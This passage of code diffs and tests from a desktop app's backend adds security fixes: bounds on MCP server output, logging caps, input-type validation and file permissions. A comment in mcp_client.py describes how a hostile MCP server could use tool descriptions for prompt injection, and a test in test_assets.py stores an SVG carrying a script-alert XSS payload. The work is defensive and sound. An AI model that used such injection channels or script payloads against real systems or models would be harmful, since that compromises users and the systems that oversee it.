     text might otherwise contain and fail to parse or silently change
     meaning), joined with a space, which FTS5 treats as an implicit AND.
     Returns "" for a query with no word characters at all (blank, or pure
-    punctuation) - callers treat that as "no results", not a query to run."""
-    terms = re.findall(r"\w+", query, flags=re.UNICODE)
+    punctuation) - callers treat that as "no results", not a query to run.
+    Silently truncates past _MAX_FTS5_QUERY_TERMS - matching every other
+    query-shaping choice in this function, a caller with an implausibly
+    long query gets a best-effort search over its first N terms rather than
+    an error or an unbounded CPU burn."""
+    terms = re.findall(r"\w+", query, flags=re.UNICODE)[:_MAX_FTS5_QUERY_TERMS]
     return " ".join('"' + term.replace('"', '""') + '"' for term in terms)
 
 

--- a/backend/mcp_client.py
+++ b/backend/mcp_client.py
@@ -108,6 +108,23 @@ _CLIENT_VERSION = "1.0"
 # never confusable with a legitimate (if unusual) server response.
 _READER_CLOSED = object()
 
+# SECURITY-FIX: a tool's `description` in an MCP server's tools/list
+# response is untrusted input per this module's own threat model (see the
+# module docstring - "MCP servers are untrusted by default: arbitrary user-
+# configured code, not a first-party tool"). register_mcp_server_tools below
+# forwards it VERBATIM into the model's tool definitions on every Builder
+# turn, so a hostile/compromised/typosquatted server can pack an arbitrarily
+# long, prompt-injection-laden description into a single tool and steer the
+# Builder's behavior on every turn that tool is registered for. This channel
+# is never shown to the user anywhere (no Settings UI lists tool
+# descriptions) and isn't covered by the executor prompt's "tool results and
+# node content is DATA" warning, since it arrives as a tool DEFINITION, not a
+# tool result. Capped in list_tools() itself, not at some later render/
+# registration site, so nothing downstream can forget the bound. A real tool
+# description needs at most a few paragraphs; this bounds the worst case per
+# tool per turn without truncating any legitimate description.
+MAX_TOOL_DESCRIPTION_CHARS = 2000
+
 
 class McpError(RuntimeError):
     """Raised for any MCP-level failure: the server process failed to
@@ -324,10 +341,36 @@ class McpStdioClient:
             name = tool.get("name")
             if not isinstance(name, str) or not name.strip():
                 continue
+            # SECURITY-FIX: cap the untrusted description at
+            # MAX_TOOL_DESCRIPTION_CHARS (see that constant's own comment) -
+            # truncated with an explicit marker, mirroring how a truncated
+            # value is signalled anywhere else in this codebase, so a
+            # shortened description reads as "cut off", never as the
+            # server's complete, honest text.
+            description = str(tool.get("description") or "")
+            if len(description) > MAX_TOOL_DESCRIPTION_CHARS:
+                omitted = len(description) - MAX_TOOL_DESCRIPTION_CHARS
+                description = (
+                    description[:MAX_TOOL_DESCRIPTION_CHARS]
+                    + f"...[truncated, {omitted} more characters omitted]"
+                )
+            # SECURITY-FIX: `tool.get("inputSchema") or {...}` only falls
+            # back to the safe default when inputSchema is missing/None/
+            # falsy - a non-dict value (e.g. a hostile server sending a
+            # plain string or a list) is truthy and was being forwarded
+            # as-is straight into ToolSpec.input_schema, which every
+            # provider's tool-call translation assumes is a JSON Schema
+            # dict (see ToolSpec's own docstring). That broke the provider
+            # call downstream instead of degrading gracefully. Validate the
+            # TYPE explicitly so a non-dict schema falls back the same way
+            # a missing one already does.
+            input_schema = tool.get("inputSchema")
+            if not isinstance(input_schema, dict):
+                input_schema = {"type": "object"}
             specs.append(ToolSpec(
                 name=name,
-                description=str(tool.get("description") or ""),
-                input_schema=tool.get("inputSchema") or {"type": "object"},
+                description=description,
+                input_schema=input_schema,
             ))
         return tuple(specs)
 

--- a/backend/mcp_client.py
+++ b/backend/mcp_client.py
@@ -61,6 +61,46 @@ from graphlink_process_env import safe_subprocess_env
 # client actually uses have been stable across every MCP revision to date).
 MCP_PROTOCOL_VERSION = "2024-11-05"
 _CLIENT_NAME = "graphlink"
+
+# SECURITY-FIX: an MCP tool result is returned to the Builder uncapped -
+# unlike every built-in graph tool (backend/tools_graph.py's own excerpting,
+# e.g. read_subgraph's nodes_truncated flag), a server's response text was
+# handed straight through, whatever its size. The server is untrusted (this
+# module's own docstring already treats it as such for env/approval), so an
+# oversized text block round-trips intact into the Builder's message list
+# and is re-sent to the provider on every subsequent turn - a cheap way for
+# a hostile or misbehaving server to blow the model's context/cost budget
+# with a single call. 200_000 chars comfortably covers a real tool answer
+# (a file read, a search result page) while bounding the pathological case.
+MAX_TOOL_RESULT_CHARS = 200_000
+
+# SECURITY-FIX: `for line in process.stdout` (below, in _read_loop) - plain
+# text-mode line iteration - accumulates an ENTIRE line in memory before
+# ever yielding it, with no upper bound. A hostile or simply broken server
+# that writes to stdout without ever emitting a newline grows that buffer
+# without limit; Python eventually raises MemoryError on the reader daemon
+# thread, which threading.excepthook reports through the crash logger,
+# taking the desktop app down. 8MB comfortably covers any real single
+# JSON-RPC message (tools/list, a tool result before its own
+# MAX_TOOL_RESULT_CHARS cap applies) while bounding the pathological case
+# to a fixed, small amount of memory per read.
+_MAX_STDOUT_LINE_CHARS = 8_000_000
+# How many additional bounded reads _read_loop will perform to resync past
+# a single oversized/never-terminated line before giving up and treating
+# the connection as unrecoverably desynced. Each read is itself capped at
+# _MAX_STDOUT_LINE_CHARS, so this bounds total memory for the discard, not
+# just each individual chunk.
+_MAX_OVERSIZED_LINE_RESYNC_READS = 4
+
+# SECURITY-FIX: _drain_stderr's ring buffer bounds the NUMBER of retained
+# lines (200) but not the LENGTH of any one of them - `for line in
+# process.stderr` accumulated an entire line in memory first, same as the
+# stdout case above. A hostile/broken server writing to stderr without
+# newlines could still exhaust memory even with the line-count cap in
+# place. _stderr_tail_text only ever keeps the final 2000 chars anyway, so
+# each stored line is capped well above that (with room for several lines
+# of real diagnostic context) rather than truly unbounded.
+_MAX_STDERR_LINE_CHARS = 4_000
 _CLIENT_VERSION = "1.0"
 
 # A reader-thread sentinel distinct from any real JSON-RPC payload (a plain
@@ -306,16 +346,53 @@ class McpStdioClient:
             for block in content
             if isinstance(block, dict) and block.get("type") == "text"
         ]
-        return ToolResult(content="\n".join(text_parts), is_error=bool(response.get("isError", False)))
+        result_text = "\n".join(text_parts)
+        if len(result_text) > MAX_TOOL_RESULT_CHARS:
+            result_text = (
+                result_text[:MAX_TOOL_RESULT_CHARS]
+                + f"\n...[truncated, {len(result_text) - MAX_TOOL_RESULT_CHARS} more characters omitted]"
+            )
+        return ToolResult(content=result_text, is_error=bool(response.get("isError", False)))
 
     # -- JSON-RPC framing ------------------------------------------------
+
+    @staticmethod
+    def _drain_oversized_line(stdout) -> bool:
+        """Consumes the remainder of a single line that already exceeded
+        _MAX_STDOUT_LINE_CHARS, in further _MAX_STDOUT_LINE_CHARS-bounded
+        reads, until the real trailing newline (or EOF) is found - so
+        _read_loop's own next readline() starts at a genuine line boundary
+        again instead of misinterpreting the tail of a too-long line as a
+        fresh one. Returns True once resynced, False if the line is still
+        not terminated after _MAX_OVERSIZED_LINE_RESYNC_READS more reads
+        (a server that just never stops writing) - the caller treats that
+        as unrecoverable and stops reading."""
+        for _ in range(_MAX_OVERSIZED_LINE_RESYNC_READS):
+            chunk = stdout.readline(_MAX_STDOUT_LINE_CHARS)
+            if chunk == "" or chunk.endswith("\n"):
+                return True
+        return False
 
     def _read_loop(self) -> None:
         process = self._process
         assert process is not None and process.stdout is not None
         try:
-            for line in process.stdout:
-                line = line.strip()
+            while True:
+                # SECURITY-FIX: readline(size) bounds a single read to
+                # _MAX_STDOUT_LINE_CHARS instead of the unbounded `for line
+                # in process.stdout` this replaced - see that constant's own
+                # doc. Returns "" only at real EOF; a chunk that hits the
+                # cap with no trailing "\n" means the real line is longer
+                # than the cap, so the rest of it is discarded (bounded, via
+                # _drain_oversized_line) rather than ever held in memory.
+                raw_line = process.stdout.readline(_MAX_STDOUT_LINE_CHARS)
+                if raw_line == "":
+                    break  # EOF
+                if len(raw_line) >= _MAX_STDOUT_LINE_CHARS and not raw_line.endswith("\n"):
+                    if not self._drain_oversized_line(process.stdout):
+                        break  # could not resync within the read budget - give up
+                    continue
+                line = raw_line.strip()
                 if not line:
                     continue
                 try:
@@ -350,7 +427,10 @@ class McpStdioClient:
         if process is None or process.stderr is None:
             return
         try:
-            for line in process.stderr:
+            while True:
+                line = process.stderr.readline(_MAX_STDERR_LINE_CHARS)
+                if line == "":
+                    break  # EOF
                 self._stderr_tail.append(line)
         except (ValueError, OSError):
             # stderr closed out from under us (close() race) - nothing left
@@ -448,6 +528,17 @@ class McpStdioClient:
                     if "error" in payload:
                         error = payload["error"]
                         message_text = error.get("message", error) if isinstance(error, dict) else error
+                        # SECURITY-FIX: message_text comes straight from the
+                        # (untrusted) server with no length bound - a hostile
+                        # or misbehaving server's error.message could be
+                        # arbitrarily large, and this exception's text flows
+                        # into agents.py's own logger.warning(...) call and
+                        # into user-facing notification text, unbounded.
+                        # Same 2000-char bound this file already uses for
+                        # the stderr-tail diagnostic just above.
+                        message_text = str(message_text)
+                        if len(message_text) > 2000:
+                            message_text = message_text[:2000] + "…[truncated]"
                         raise McpError(f"{method} failed: {message_text}")
                     return payload.get("result", {}) or {}
             finally:

--- a/backend/native_dialogs.py
+++ b/backend/native_dialogs.py
@@ -28,9 +28,38 @@ also what pywebview itself returns on cancel.
 from __future__ import annotations
 
 import asyncio
+import contextvars
+import functools
+from concurrent.futures import ThreadPoolExecutor
 from typing import Sequence
 
 import webview
+
+# SECURITY-FIX (native-dialog-intents-pin-default-executor-threads): a native
+# dialog blocks its worker thread until the user dismisses the OS picker -
+# no timeout, no cap. asyncio.to_thread always runs on the loop's shared
+# DEFAULT executor, the same pool ~177 other to_thread call sites across the
+# backend depend on (settings run_locked, chat-library/autosave SQLite work,
+# knowledge search, Ollama/llama.cpp scans). One dialog per WebSocket
+# connection, with enough connections, exhausts that shared pool and stalls
+# every other to_thread hop in the process until the dialogs are closed.
+# A small dedicated pool keeps dialog threads off the shared one entirely;
+# max_workers=4 is headroom above the one-dialog-at-a-time OS-modal reality,
+# not an invitation to run more concurrently.
+_DIALOG_EXECUTOR = ThreadPoolExecutor(max_workers=4, thread_name_prefix="native-dialog")
+
+
+async def _run_in_dialog_executor(func, /, *args, **kwargs):
+    """asyncio.to_thread's own implementation, minus its use of the shared
+    default executor - pinned to _DIALOG_EXECUTOR instead (see the
+    SECURITY-FIX comment above _DIALOG_EXECUTOR for why that distinction is
+    the entire point). contextvars.copy_context() is carried over from
+    asyncio.to_thread verbatim so callers see identical context propagation
+    either way."""
+    loop = asyncio.get_running_loop()
+    ctx = contextvars.copy_context()
+    func_call = functools.partial(ctx.run, func, *args, **kwargs)
+    return await loop.run_in_executor(_DIALOG_EXECUTOR, func_call)
 
 
 def _active_window():
@@ -48,7 +77,7 @@ async def pick_file(file_types: Sequence[str] = (), directory: str = "") -> str 
     window = _active_window()
     if window is None:
         return None
-    result = await asyncio.to_thread(
+    result = await _run_in_dialog_executor(
         window.create_file_dialog,
         webview.FileDialog.OPEN,
         directory=directory,
@@ -63,7 +92,7 @@ async def pick_folder(directory: str = "") -> str | None:
     window = _active_window()
     if window is None:
         return None
-    result = await asyncio.to_thread(window.create_file_dialog, webview.FileDialog.FOLDER, directory=directory)
+    result = await _run_in_dialog_executor(window.create_file_dialog, webview.FileDialog.FOLDER, directory=directory)
     return result[0] if result else None
 
 
@@ -83,7 +112,7 @@ async def pick_save_file(default_name: str, file_types: Sequence[str] = (), dire
     window = _active_window()
     if window is None:
         return None
-    result = await asyncio.to_thread(
+    result = await _run_in_dialog_executor(
         window.create_file_dialog,
         webview.FileDialog.SAVE,
         directory=directory,

--- a/backend/observability.py
+++ b/backend/observability.py
@@ -30,6 +30,21 @@ from datetime import datetime, timezone
 
 _VALID_LEVEL_NAMES = ("DEBUG", "INFO", "WARNING", "ERROR")
 
+# Third-party SDK loggers whose own internal DEBUG logging includes the full
+# outbound request body: openai._base_client and anthropic._base_client both
+# do `log.debug("Request options: %s", model_dump(options))` on every call,
+# where `options` is the FinalRequestOptions carrying `json_data` - i.e.
+# every chat message and system prompt sent to the provider. Both loggers
+# are created via `logging.getLogger(__name__)` inside a `_base_client`
+# submodule, so capping the PACKAGE-ROOT name here governs every descendant
+# logger through Python's ancestor-lookup rule - no need to enumerate
+# `openai._base_client`, `openai._legacy_response`, etc individually.
+# (httpx/httpcore, the shared HTTP transport underneath both SDKs, were
+# checked too and don't need a cap: httpx logs its request/response lines at
+# INFO, not DEBUG, and httpcore's DEBUG trace logs repr() a Request object
+# whose __repr__ is `<Request [b'POST']>` - method only, no body.)
+_THIRD_PARTY_SDK_LOGGER_NAMES = ("openai", "anthropic")
+
 # The record attributes this formatter promotes into the JSON payload when a
 # call site supplies them via extra=. Never required - a plain
 # `logger.info("message")` with no extra still produces valid JSON, just
@@ -95,4 +110,17 @@ def apply_log_level(level_name: str) -> None:
     crash startup over something as low-stakes as verbosity."""
     if level_name not in _VALID_LEVEL_NAMES:
         return
-    logging.getLogger().setLevel(getattr(logging, level_name))
+    level = getattr(logging, level_name)
+    logging.getLogger().setLevel(level)
+    # SECURITY-FIX (OBS-1-debug-level-logs-chat-content): the ROOT setLevel
+    # above lets openai/anthropic's own internal loggers inherit DEBUG via
+    # normal propagation, which would dump the full request body (see the
+    # comment on _THIRD_PARTY_SDK_LOGGER_NAMES above) into graphlink.log -
+    # the file this app's own bug-report/Diagnostics flow tells users to
+    # attach. Cap those loggers to no more verbose than INFO explicitly, on
+    # EVERY call (not just when DEBUG is requested), so a later call with a
+    # less verbose level correctly de-escalates them too instead of leaving
+    # them pinned at a stale INFO cap from a previous DEBUG call.
+    third_party_level = max(level, logging.INFO)
+    for logger_name in _THIRD_PARTY_SDK_LOGGER_NAMES:
+        logging.getLogger(logger_name).setLevel(third_party_level)

--- a/backend/observability.py
+++ b/backend/observability.py
@@ -64,6 +64,26 @@ class JsonLogFormatter(logging.Formatter):
         return json.dumps(payload, ensure_ascii=False)
 
 
+def resolve_log_level(level_name: object, default: int = logging.INFO) -> int:
+    """SECURITY-FIX: maps a persisted log-level NAME to its logging-module
+    int constant, falling back to `default` for anything outside the closed
+    vocabulary - including a non-string JSON value (a list/int/null read
+    straight off session.dat) - instead of raising. graphlink_desktop.py's
+    main() used to do this itself via a bare
+    `getattr(logging, SettingsManager().get_log_level(), logging.INFO)`:
+    getattr's default only covers a MISSING attribute, not a present-but-
+    wrong-shaped one, so a persisted value naming any other module
+    attribute ("shutdown", "Formatter", "handlers") returned that object
+    instead of an int, and a non-string value raised TypeError outright -
+    either way crashing every launch, before configure_logging ever attaches
+    a handler or install_exception_handlers runs. Called before any handler
+    exists, so unlike apply_log_level below this can't just skip silently -
+    it must always return something configure_logging can use."""
+    if not isinstance(level_name, str) or level_name not in _VALID_LEVEL_NAMES:
+        return default
+    return getattr(logging, level_name)
+
+
 def apply_log_level(level_name: str) -> None:
     """Sets the ROOT logger's level at runtime - safe to call any time after
     configure_logging() has attached its handlers (backend/crash_recovery.py),

--- a/backend/session_load.py
+++ b/backend/session_load.py
@@ -1569,7 +1569,18 @@ def _restore_chat_into_document(
     for index, node_payload in enumerate(node_payloads):
         if not isinstance(node_payload, dict):
             continue
-        node_type = node_payload.get("node_type", "chat")
+        # SECURITY-FIX: node_type feeds _NODE_RESTORERS.get(node_type) - a
+        # dict-key lookup that raises TypeError('unhashable type') uncaught
+        # for a non-hashable JSON value (a list or dict), aborting the
+        # ENTIRE chat load over one malformed node in a hostile or
+        # hand-corrupted saved chat, the same class of bug already fixed
+        # elsewhere in this file for other unhashable-lookup sites. A
+        # non-string node_type is simply unrecognized, exactly like any
+        # other unknown kind string - str() coercion keeps it hashable so
+        # the existing "skip, don't raise" fallback in _restore_node
+        # actually runs instead of crashing before it's reached.
+        raw_node_type = node_payload.get("node_type", "chat")
+        node_type = raw_node_type if isinstance(raw_node_type, str) else str(raw_node_type)
         node, parent_new_id = _restore_node(
             document, node_type, node_payload, all_nodes_map, plugin_registry, settings_manager,
         )

--- a/backend/settings.py
+++ b/backend/settings.py
@@ -65,7 +65,7 @@ register_settings_*_intents function in turn.
 
 from __future__ import annotations
 
-from typing import Any
+from typing import TYPE_CHECKING, Any
 
 import api_provider
 import graphlink_task_config as config
@@ -89,6 +89,9 @@ from backend.api.intents_settings_llama_cpp import register_settings_llama_cpp_i
 from backend.api.intents_settings_ollama import register_settings_ollama_intents
 from backend.events import SessionBus
 from backend.notifications import NotificationState
+
+if TYPE_CHECKING:
+    from backend.agents import AgentDispatcher
 
 # Re-exported verbatim: backend/composer.py's own setReasoningLevel/setModel
 # intents import all seven of these directly (`from backend.settings import
@@ -374,12 +377,19 @@ def _build_settings_payload(manager: SettingsManager, state: SettingsSessionStat
 
 
 def register_settings(
-    bus: SessionBus, manager: SettingsManager, notifications: NotificationState | None = None
+    bus: SessionBus,
+    manager: SettingsManager,
+    notifications: NotificationState | None = None,
+    agent_dispatcher: "AgentDispatcher | None" = None,
 ) -> None:
     # notifications is optional only so the ~11 pre-R7.4a tests in
     # backend/tests/test_settings.py that call register_settings(bus,
     # manager) keep working unchanged - the real (and only) production call
     # site, backend/app.py's _configure_session, always passes a real one.
+    # agent_dispatcher is likewise optional and trailing, same reason: only
+    # setMcpServers (routed to register_settings_general_intents below)
+    # needs it, to invalidate the Builder's cached MCP tool registry on a
+    # save - see AgentDispatcher.invalidate_builder_registry's docstring.
     #
     # activeSection is session-local UI navigation, not SettingsManager
     # state - the legacy bridge didn't persist it either (the dialog always
@@ -400,7 +410,7 @@ def register_settings(
 
     # ADR-006 stage 6.5: the general page now takes notifications too - its
     # new setProviderMode intent surfaces switch failures/success banners.
-    register_settings_general_intents(bus, manager, state, notifications)
+    register_settings_general_intents(bus, manager, state, notifications, agent_dispatcher)
     register_settings_api_provider_intents(bus, manager, notifications, state)
     register_settings_ollama_intents(bus, manager, state)
     register_settings_llama_cpp_intents(bus, manager, state)

--- a/backend/tests/test_app_ws.py
+++ b/backend/tests/test_app_ws.py
@@ -558,6 +558,45 @@ def test_a_non_list_topics_field_gets_a_graceful_error_not_a_dropped_connection(
         assert snapshot["kind"] == "state"
 
 
+def test_a_non_string_topic_element_gets_a_graceful_error_not_a_dropped_connection():
+    """SECURITY-FIX: `topics` was checked to be a list, but not that each
+    ELEMENT is a string - {"topics": [{}]} passed the list check and
+    reached send_snapshot -> self._topics.get(topic), which raised
+    TypeError('unhashable type: dict'), not UnknownTopicError, escaping
+    uncaught and killing the connection."""
+    client = make_client()
+    with client.websocket_connect("/ws") as ws:
+        ws.send_json({"kind": "subscribe", "topics": [{}], "id": 1})
+        message = ws.receive_json()
+        assert message["kind"] == "error"
+        assert message["id"] == 1
+        assert "topic" in message["error"]
+
+        ws.send_json({"kind": "subscribe", "topics": ["system"]})
+        snapshot = ws.receive_json()
+        assert snapshot["kind"] == "state"
+
+
+def test_a_non_list_args_field_for_an_unschemad_intent_gets_a_graceful_error_not_mangled_positional_unpacking():
+    """SECURITY-FIX: a schema'd intent already rejects non-list args via
+    _validate_intent_args (see test_showinfo_rejects_a_dict_shaped_args_
+    frame above); an intent with NO schema - "system"/"ping" here, which
+    takes `*args` - skipped that check entirely, so `handler(*args)`
+    unpacked whatever shape the client sent. A string star-unpacks by
+    character instead of raising a validation error."""
+    client = make_client()
+    with client.websocket_connect("/ws") as ws:
+        ws.send_json({"kind": "intent", "topic": "system", "intent": "ping", "args": "abc", "id": 1})
+        message = ws.receive_json()
+        assert message["kind"] == "error"
+        assert message["id"] == 1
+        assert message["error"] == "Invalid arguments: expected a list of arguments, got str."
+
+        ws.send_json({"kind": "subscribe", "topics": ["system"]})
+        snapshot = ws.receive_json()
+        assert snapshot["kind"] == "state"
+
+
 def test_sessions_do_not_share_connections():
     # ADR-004 stage 4.3: tests EventBus's own generic cross-session
     # isolation mechanism, a scenario the real shipped app's restrictive

--- a/backend/tests/test_assets.py
+++ b/backend/tests/test_assets.py
@@ -97,6 +97,55 @@ def test_get_asset_falls_back_to_a_safe_content_type_for_a_non_image_mime_type()
     assert response.headers["content-type"] == "application/octet-stream"
 
 
+def test_get_asset_coerces_svg_mime_type_to_octet_stream():
+    # SECURITY-FIX regression: image/svg+xml used to be in
+    # ALLOWED_IMAGE_MIME_TYPES, so a stored SVG (hostile bytes are within
+    # this app's documented threat boundary - a saved chat or imported
+    # archive, since neither write path into image_assets validates
+    # mime_type) came back with Content-Type: image/svg+xml, real active
+    # content at this app's own origin the moment anything ever loads an
+    # asset URL as a top-level document/iframe rather than an <img> src.
+    # asset_store.ALLOWED_IMAGE_MIME_TYPES now excludes svg+xml, so this
+    # route's existing "not in the allowlist" fallback catches it.
+    client = make_client()
+    bus = client.app.state.bus
+    document = get_session_context(bus.session("default")).canvas_document
+    parent = document.add_node(0, 0, "parent")
+    node = document.add_image_node(
+        0, 0, b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>",
+        "prompt", parent.id, mime_type="image/svg+xml",
+    )
+
+    response = client.get(f"/api/assets/{node.state.image_asset_id}")
+
+    assert response.status_code == 200
+    assert response.headers["content-type"] == "application/octet-stream"
+    assert response.content == b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>"
+
+
+def test_get_asset_sets_nosniff_and_content_disposition_on_every_response():
+    # SECURITY-FIX regression: this route used to set neither
+    # X-Content-Type-Options nor Content-Disposition at all, leaving a
+    # browser free to content-sniff the bytes into something other than the
+    # declared Content-Type and giving a future top-level-document/iframe
+    # consumer no explicit handling instruction. Checked against a plain,
+    # legitimate PNG so this isn't entangled with the svg/octet-stream
+    # coercion above, and the PNG's own mime type still round-trips
+    # unchanged (no regression to the normal case).
+    client = make_client()
+    bus = client.app.state.bus
+    document = get_session_context(bus.session("default")).canvas_document
+    parent = document.add_node(0, 0, "parent")
+    node = document.add_image_node(0, 0, b"\x89PNG raw bytes", "a test image", parent.id, mime_type="image/png")
+
+    response = client.get(f"/api/assets/{node.state.image_asset_id}")
+
+    assert response.status_code == 200
+    assert response.headers["content-type"] == "image/png"
+    assert response.headers["x-content-type-options"] == "nosniff"
+    assert response.headers["content-disposition"] == f'inline; filename="{node.state.image_asset_id}.png"'
+
+
 def test_get_asset_for_unknown_id_returns_404_json():
     client = make_client()
 

--- a/backend/tests/test_chat_library.py
+++ b/backend/tests/test_chat_library.py
@@ -3422,6 +3422,13 @@ class TestGlobalSearchAcrossWorkspaces:
     def test_a_workspace_filter_scopes_the_search_to_one_workspace(self, db_path, knowledge_db_path, monkeypatch):
         import backend.api.intents_global_search as igs_module
         monkeypatch.setattr(igs_module, "DEFAULT_DB_PATH", knowledge_db_path)
+        # get_all_workspaces/DEFAULT_DB_PATH are imported LAZILY inside
+        # intents_global_search.search() (see its own comment on why -
+        # circular with backend.canvas), so this must patch the real
+        # backend.chat_library attribute, not a module-level name on
+        # igs_module the way the knowledge_store DEFAULT_DB_PATH line above
+        # does.
+        monkeypatch.setattr(chat_library_module, "DEFAULT_DB_PATH", db_path)
 
         get_all_chats(db_path)
         workspace_a = get_all_workspaces(db_path)[0]
@@ -3449,6 +3456,47 @@ class TestGlobalSearchAcrossWorkspaces:
         )
         assert len(scoped_to_b["results"]) == 1
         assert scoped_to_b["results"][0]["sourceNodeId"] == "b1"
+
+    def test_a_nonexistent_workspace_id_does_not_create_a_phantom_collection_row(
+        self, db_path, knowledge_db_path, monkeypatch,
+    ):
+        # SECURITY-FIX: globalSearch/search is documented and used as a
+        # READ-ONLY intent, but it called get_or_create_workspace_collection
+        # (a SELECT-or-INSERT) directly on whatever integer workspaceId the
+        # caller sent, with no check that the id names a real chats.db
+        # workspace - so a "search" request against an id that never
+        # existed silently grew the knowledge.db collections table. It must
+        # now behave like an unrecognized id was never given: no new
+        # collection row, and results identical to an unscoped search.
+        import backend.api.intents_global_search as igs_module
+        monkeypatch.setattr(igs_module, "DEFAULT_DB_PATH", knowledge_db_path)
+        monkeypatch.setattr(chat_library_module, "DEFAULT_DB_PATH", db_path)
+
+        get_all_chats(db_path)  # bootstraps a fully-migrated chats.db
+        save_chat_atomically_row(
+            db_path, None, "Graph A", {"nodes": [
+                {"node_type": "chat", "id": "a1", "raw_content": "existent workspace term", "is_user": True},
+            ]}, [], [], knowledge_db_path=knowledge_db_path,
+        )
+
+        def _collection_count():
+            with contextlib.closing(sqlite3.connect(knowledge_db_path)) as conn:
+                return conn.execute("SELECT COUNT(*) FROM collections").fetchone()[0]
+
+        before = _collection_count()
+
+        bus, _document, _notifications = _bus_with_canvas(db_path)
+        register_global_search_intents(bus)
+        nonexistent_workspace_id = 999_999
+        result = asyncio.run(
+            bus.dispatch_intent("globalSearch", "search", ["existent workspace term", 10, nonexistent_workspace_id])
+        )
+
+        assert _collection_count() == before, "an unrecognized workspaceId must not mint a new collection row"
+        # Falls back to an unscoped search rather than erroring or returning
+        # nothing - same "omitted or invalid -> no filter" posture newChat
+        # already established for an unrecognized workspaceId.
+        assert len(result["results"]) == 1
 
     def test_a_document_hit_carries_no_graph_id_or_source_node_id(self, db_path, knowledge_db_path, monkeypatch):
         # A real ingested document (not a graph) must be distinguishable

--- a/backend/tests/test_chat_library.py
+++ b/backend/tests/test_chat_library.py
@@ -1124,6 +1124,29 @@ def test_get_all_chats_reads_real_rows(db_path):
         assert isinstance(row["workspaceId"], int)
 
 
+def test_get_all_chats_skips_a_row_with_a_non_numeric_column_instead_of_crashing(db_path):
+    """SECURITY-FIX: SQLite's type affinity does not enforce that an
+    INTEGER column actually holds a number - a hand-corrupted or hostile
+    chats.db can store TEXT there. int(row[...]) raised uncaught, and this
+    function backs the app-chat-library topic republished on nearly every
+    user action, so one bad row killed the whole library listing
+    repeatedly, not just once."""
+    good_id = _insert_chat(db_path, "Good")
+    get_all_chats(db_path)  # triggers the chats -> graphs migration first
+    with contextlib.closing(sqlite3.connect(db_path)) as conn, conn:
+        conn.execute(
+            "INSERT INTO graphs (title, data, created_at, updated_at) VALUES (?, ?, ?, ?)",
+            ("Corrupt", "{}", "2026-01-02T00:00:00", "2026-01-02T00:00:00"),
+        )
+        bad_id = conn.execute("SELECT id FROM graphs WHERE title = 'Corrupt'").fetchone()[0]
+        conn.execute("UPDATE graphs SET workspace_id = 'not-a-number' WHERE id = ?", (bad_id,))
+
+    rows = get_all_chats(db_path)  # must not raise
+
+    ids = {row["id"] for row in rows}
+    assert ids == {good_id}, "the corrupt row must be skipped, the good row must survive"
+
+
 def test_format_timestamp_matches_legacy_display_format():
     assert _format_timestamp("2026-01-02 11:30:00") == "Jan 02, 2026 11:30 AM"
     assert _format_timestamp("") == "Unknown"

--- a/backend/tests/test_crash_recovery.py
+++ b/backend/tests/test_crash_recovery.py
@@ -12,6 +12,7 @@ import json
 import logging
 import logging.handlers
 import os
+import stat
 import sys
 import threading
 from pathlib import Path
@@ -32,6 +33,13 @@ from backend.crash_recovery import (
 )
 import backend.crash_recovery as crash_recovery_module
 from backend.notifications import NotificationState
+
+# chmod's real effect is POSIX-only (os.chmod on Windows only ever toggles
+# the read-only attribute, never real permission bits) - same split
+# backend/tests/test_scratch_dirs.py already uses for graphlink_scratch_dirs.py's
+# own chmod calls: a platform-independent "chmod was invoked with 0o600" spy
+# test that runs everywhere, plus a POSIX-only real-stat test skipped here.
+POSIX_ONLY = pytest.mark.skipif(sys.platform == "win32", reason="POSIX chmod semantics only apply on POSIX")
 
 
 # -- path construction --------------------------------------------------
@@ -325,3 +333,112 @@ def test_install_exception_handlers_can_be_retried_after_a_failure(
     install_exception_handlers(tmp_path)
 
     assert sys.excepthook is not original_hook, "a retry after a failure must actually install"
+
+
+# -- SECURITY-FIX (OBS-3): 0600 permissions on log/crash files --------------
+#
+# graphlink.log (and its rotated backups), crash/faulthandler.log, and
+# diagnostics/bundle-*.json were the one remaining exception to this
+# codebase's established "every ~/.graphlink file that can carry user
+# content gets chmod'ed 0600" posture (session.dat, chats.db, asset files).
+# All three can embed chat content and absolute paths - see this module's
+# own docstring and the many logger.exception()/logger.error() call sites
+# this file's handler collects from across backend/.
+
+
+def test_chmod_0600_invokes_chmod_with_0o600_on_posix(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "linux")
+    calls = []
+    monkeypatch.setattr(crash_recovery_module.os, "chmod", lambda path, mode: calls.append((path, mode)))
+    target = tmp_path / "some.log"
+    target.write_text("x", encoding="utf-8")
+
+    crash_recovery_module._chmod_0600(target)
+
+    assert (target, 0o600) in calls
+
+
+def test_chmod_0600_is_not_invoked_on_windows(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "win32")
+    calls = []
+    monkeypatch.setattr(crash_recovery_module.os, "chmod", lambda path, mode: calls.append((path, mode)))
+
+    crash_recovery_module._chmod_0600(tmp_path / "some.log")
+
+    assert calls == []
+
+
+def test_chmod_0600_failure_is_logged_and_swallowed_not_raised(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "linux")
+
+    def _boom(path, mode):
+        raise OSError("permission denied")
+
+    monkeypatch.setattr(crash_recovery_module.os, "chmod", _boom)
+
+    crash_recovery_module._chmod_0600(tmp_path / "some.log")  # must not raise
+
+
+def test_configure_logging_chmods_the_log_file_to_0600_on_posix(tmp_path, monkeypatch, isolated_logging_state):
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "linux")
+    calls = []
+    monkeypatch.setattr(crash_recovery_module.os, "chmod", lambda path, mode: calls.append((path, mode)))
+
+    configure_logging(tmp_path)
+
+    assert (log_path(tmp_path), 0o600) in calls
+
+
+def test_configure_logging_does_not_chmod_on_windows(tmp_path, monkeypatch, isolated_logging_state):
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "win32")
+    calls = []
+    monkeypatch.setattr(crash_recovery_module.os, "chmod", lambda path, mode: calls.append((path, mode)))
+
+    configure_logging(tmp_path)
+
+    assert calls == []
+
+
+def test_install_exception_handlers_chmods_faulthandler_log_to_0600_on_posix(
+    tmp_path, monkeypatch, isolated_exception_handler_state,
+):
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "linux")
+    calls = []
